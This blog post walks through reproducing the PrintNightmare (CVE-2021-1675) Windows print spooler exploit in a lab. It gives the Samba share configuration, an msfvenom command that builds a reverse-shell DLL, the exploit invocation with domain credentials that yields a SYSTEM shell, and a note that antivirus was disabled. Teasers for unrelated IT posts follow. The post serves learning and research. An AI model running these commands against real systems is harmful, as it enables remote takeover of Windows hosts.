Skip to main content

PrintNightmare (CVE-2021-1675) PoC exploit Walkthrough

I am not an exploit developer but was interested to see how this vulnerability can be exploited. So i tried to replicate the infamous PrintNightmare vulnerability using the following PoCs (https://github.com/cube0x0/CVE-2021-1675) and (https://github.com/rapid7/metasploit-framework/pull/15385)

However i had trouble with the new metasploit module (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare) and i couldn't able to exploit the machine successfully.
So i tried the second PoC from cube0x0. This one has done the magic. I just followed the guidelines with couple of tweaks.
First of all, i installed the impacket (cube0x0 version) which will install the required modules and files.
After that i set up a samba share with an anonymous login. This is required for hosting the dll file. I edited the smb.conf with the following settings.

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[public]
    comment = Samba
    path = /var/public
    guest ok = yes
    read only = no
    browsable = yes
    force user = root

Then i created the dll which is required to perform the exploit.The dll file is further called remotely while we execute our exploit script.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.106 LPORT=4444 -f dll -o /var/public/rev.dll

I then placed the newly created dll file (rev.dll) to the smb location (/var/public). Also set up a netcat listener for facilitating the reverse connection.
Then i used the exploit to perform the PoC using a low privileged domain user.

 #python3 CVE-2021-1675.py jaacostan.local/bob:Pass123@192.168.0.251 '\\192.168.0.106\\public\\rev.dll' 

And that's it, i got the reverse-shell with the elevated privileges (nt authority\system). 

Couple of things i did, i disabled the Defender. Since i used msfvenom to create the dll, the antivirus detects it as malicious and they delete it. Also, though the python script threw some error, i was able to get the reverse shell.

Note that, you can also host the DLL on a CIFS share (if using windows). For that, set up a CIFS share with anonymous login on your windows machine and you might also need to enable SMBv2 support. 
There are other PoC available in GitHub, that demonstrates the same from a Local Privilege Escalation PoV instead of RCE. If you are interested to learn/research more, you may check this https://github.com/calebstewart/CVE-2021-1675

I found the following image in my twitter feed. This make sense of the vulnerability and it's impact.

Image Source : Twitter feed. Full credits to the image owners (Outflank/Stan Hegt) as mentioned in the image.
 
Reference and courtesy:-
  • https://github.com/cube0x0/CVE-2021-1675
  • https://github.com/rapid7/metasploit-framework/pull/15385
  • https://github.com/calebstewart/CVE-2021-1675
 



 


 

Labels:

Popular posts from this blog

Download Microsoft Office 2019 offline installer.

When you do malware analysis of documents or office files, it is important to have Microsoft Office installed in your Lab machine. I am using flare VM and it doesn't comes with MS Office. Since Microsoft is promoting Microsoft 365 over the offline version, finding the offline installer is not that easy. Here is the list of genuine Microsoft links to download the office .img files.  Download Microsoft Office 2019 Professional Plus : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/ProPlus2019Retail.img Download Microsoft Office 2019 Professional : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/Professional2019Retail.img Download Microsoft Office 2019 Home and Business : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/HomeBusiness2019Retail.img Download Microsoft Office 2019 Home and Student : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-U...
Read more

RUST error: linker `link.exe` not found

While compiling Rust program in a windows environment, you may encounter the error : linker `link.exe` not found. This is because of the absence of the C++ build tools in your machine. For compiling Rust programs successfully, one of the prerequisites is the installation of the Build Tools for Visual Studio 2019.   Download the Visual Studio 2019 Build tools from the Microsoft website. After the download, while installing the Build tools, make sure that you install the required components (highlighted in Yellow) This will download around 1.2GB of required files. Once everything is successfully installed, reboot and re-run your rust program and it will compile successfully.   Read More on RUST Hello World Rust Program : Code explained RUST Cargo Package Manager Explained Data Representation in Rust.
Read more

Cisco ASA: Disable SSLv3 and configure TLSv1.2.

For configuring TLS v1.2, the ASA should run software version 9.3(2) or later. In earlier versions of ASA, TLS 1.2 is not supported.If you are running the old version, it's time to upgrade. But before that i will show you the config prior to the change. I am running ASA version 9.6.1 Now ,set the server-version to tlsv1.2, though ASA supports version tlsv1.1, its always better to configure the connection to more secure. Server here in the sense, the ASA will be act as the server and the client will connect to the ASA.     #ssl server-version tlsv1.2 set the client-version to tlsv1.2, if required.     #ssl client-version tlsv1.2 ssl cipher command in ASA offers 5 predefined security levels and an additional custom level.     #ssl cipher tlsv1.2 high we can see the setting of each cipher levels using #show ssl cipher command. Now set the DH group to 24, which is the strongest offered as of now in the AS...
Read more

How to Install Netmiko on Windows?

Netmiko, developed by kirk Byers is an open source python library  based on Paramiko which simplifies SSH management to network devices and is primarily used for network automation tasks. Installing Netmiko in linux is a matter o f one single command but if you need to use Netmiko in your Windows PC, follow this process. 1) Install the latest version of Python. 2) Install Anaconda, which is an opensource distribution platform that you can install in Windows and other OS's (https://www.anaconda.com/download/) 3) From the Anaconda Shell, run “ conda install paramiko ”. 4) From the Anaconda Shell, run “ pip install scp ”. 5) Now Install the Git for Windows. (https://www.git-scm.com/downloads) . Git is required for downloading and cloning all the Netmiko library files from Github. 6) From Git Bash window, Clone Netmiko using the following command git clone https://github.com/ktbyers/netmiko&#8221         7) Onc...
Read more

[FIX] yt_dlp.utils.DownloadError: ERROR: You have requested merging of multiple formats but ffmpeg is not installed

[ISSUE] While running your python code or while executing a job : yt_dlp.utils.DownloadError: ERROR: You have requested merging of multiple formats but ffmpeg is not installed [CAUSE] Your code is unable to find ffmpeg installed in your system. [FIX] Install ffmpeg in your system. 1) Download ffmpeg package from Git or already compiled executable from the official website .  2) Once downloaded, extract the zip file and place it in your desired location. eg: C:\  3) Now add the ffmpeg bin directory location in the user environment variable path.     In the User variables section. Select Path and click on New.  Click on New and add the path. Now compile your code and it should work. For the python code to download YouTube playlist, visit https://github.com/jaacostan/YTDL
Read more

Recovery Procedure: Alcatel-Lucent Omni-Switch not booting AOS: Going to Mini-boot prompt.

Problem: Switch not booting AOS; Going to Mini-boot prompt. Model: Alcatel-Lucent OS6850 [Note:The same procedure might be applicable for different models of Omni-Switches, However, for this illustration, i have used OS-6850 ] Reason: This problem may occurs due to corrupt AOS image files or misconfigured boot parameters. Hence switch cannot boot the images properly and will go to Mini-boot prompt.  Work Around: [Note: This zmodem procedure consumes a lot to time to finish the process.] 1.) Power off your OS6850 2.) When you switched it back on, stop it before the Miniboot (there is some counter counting down from 4). Press Enter to break. 3.) You will have the following prompt " => " 4.) Enter " setenv baudrate 115200 ”. Increasing baudrate helps to increase the data transfer speed using zmodem. 5.) Enter " saveenv " 6.) Enter " boot " 7.) The switch should run now in baud rate 115200 (so you have to change your clients ter...
Read more

[FIX] Can't locate Net/SNMP.pm in @INC (you may need to install the Net::SNMP module)

I was trying to use the snmpenum.pl in my lab and encountered this error. Can't locate Net/SNMP.pm in @INC (you may need to install the Net::SNMP module) I searched over the internet for the fix , but couldn't able to find something direct. However, going through some of the stackoverflow pages, i fixed it and is explained below. 1) First install the required packages related to snmp utilities. sudo apt-get install libsnmp-perl 2) Install the SNMP module for perl. perl -MCPAN -e 'install Net::SNMP' That's it. And i was able to run the script.
Read more